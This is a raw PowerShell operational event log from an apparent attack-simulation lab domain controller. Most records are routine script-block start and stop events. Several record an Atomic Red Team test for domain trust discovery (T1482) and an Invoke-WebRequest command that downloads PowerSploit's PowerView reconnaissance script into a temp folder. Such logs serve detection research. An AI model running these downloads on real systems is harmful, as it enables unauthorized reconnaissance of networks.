Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477949
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477948
Keywords=None
Message=Started invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477947
Keywords=None
Message=Started invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477946
Keywords=None
Message=Completed invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477945
Keywords=None
Message=Started invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477944
Keywords=None
Message=Completed invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477943
Keywords=None
Message=Completed invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477942
Keywords=None
Message=Started invocation of ScriptBlock ID: c8254d99-237d-4863-87bb-0028356dd4a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477941
Keywords=None
Message=Completed invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477940
Keywords=None
Message=Started invocation of ScriptBlock ID: 38dbedb2-6aa1-4f65-9bbe-36c2e31a322c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477939
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477938
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477937
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477936
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477935
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477934
Keywords=None
Message=Started invocation of ScriptBlock ID: 09b14349-c1b3-400b-82ec-b469daf1f080
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477933
Keywords=None
Message=Started invocation of ScriptBlock ID: d0701c1a-1fc1-42c2-8856-836216e43540
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477932
Keywords=None
Message=Completed invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477931
Keywords=None
Message=Started invocation of ScriptBlock ID: b5c66ef7-f75f-4763-a002-15bb79633869
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477930
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477929
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477928
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477927
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477926
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477925
Keywords=None
Message=Completed invocation of ScriptBlock ID: 88a2af4a-0ee6-46e8-a571-ddd8e16433be
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477924
Keywords=None
Message=Started invocation of ScriptBlock ID: 88a2af4a-0ee6-46e8-a571-ddd8e16433be
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477923
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: 88a2af4a-0ee6-46e8-a571-ddd8e16433be
Path:
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477922
Keywords=None
Message=Completed invocation of ScriptBlock ID: 955a9871-e401-4166-a549-d7e044630cd5
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:58 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477921
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1a524875-4ae2-4df9-b553-223ddaf8a6cb
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:06:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478056
Keywords=None
Message=Completed invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478055
Keywords=None
Message=Started invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478054
Keywords=None
Message=Started invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478053
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478052
Keywords=None
Message=Started invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478051
Keywords=None
Message=Started invocation of ScriptBlock ID: 72eddf12-5b9d-4006-a18f-22f4fda72008
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478050
Keywords=None
Message=Creating Scriptblock text (1 of 1):
Invoke-AtomicTest T1482 -GetPrereqs

ScriptBlock ID: 72eddf12-5b9d-4006-a18f-22f4fda72008
Path:
06/15/2021 05:06:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478049
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478245
Keywords=None
Message=Completed invocation of ScriptBlock ID: 370efe8e-bfc1-4a00-918f-d7005c7e39ec
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478244
Keywords=None
Message=Started invocation of ScriptBlock ID: 370efe8e-bfc1-4a00-918f-d7005c7e39ec
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478243
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb6e5bb-bf13-4e0a-8b00-b3343958fd93
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478242
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb6e5bb-bf13-4e0a-8b00-b3343958fd93
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478241
Keywords=None
Message=Started invocation of ScriptBlock ID: 2f799c52-8d1c-4eda-ac6c-50cf709fd844
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478240
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1"}

ScriptBlock ID: 2f799c52-8d1c-4eda-ac6c-50cf709fd844
Path:
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478239
Keywords=None
Message=Started invocation of ScriptBlock ID: 0f7877f5-b9ae-4ce1-b67c-0f2c38fbc268
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478238
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1"}

ScriptBlock ID: 0f7877f5-b9ae-4ce1-b67c-0f2c38fbc268
Path:
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1478237
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1478236
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 2332 in AppDomain: DefaultAppDomain.
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1478235
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478234
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478233
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478232
Keywords=None
Message=Completed invocation of ScriptBlock ID: 81caadf3-9d1d-4005-ba58-ff7a1c30b7e9
Runspace ID: 976e0607-9d72-49d1-be38-78f9d6c7fe08
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478231
Keywords=None
Message=Completed invocation of ScriptBlock ID: c4d417b6-9588-44fe-b617-23cb91cf40a5
Runspace ID: 976e0607-9d72-49d1-be38-78f9d6c7fe08
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478230
Keywords=None
Message=Completed invocation of ScriptBlock ID: f6b24f27-1a6a-4832-93ba-64aa08eb8453
Runspace ID: 976e0607-9d72-49d1-be38-78f9d6c7fe08
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478229
Keywords=None
Message=Started invocation of ScriptBlock ID: f6b24f27-1a6a-4832-93ba-64aa08eb8453
Runspace ID: 976e0607-9d72-49d1-be38-78f9d6c7fe08
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478228
Keywords=None
Message=Started invocation of ScriptBlock ID: c4d417b6-9588-44fe-b617-23cb91cf40a5
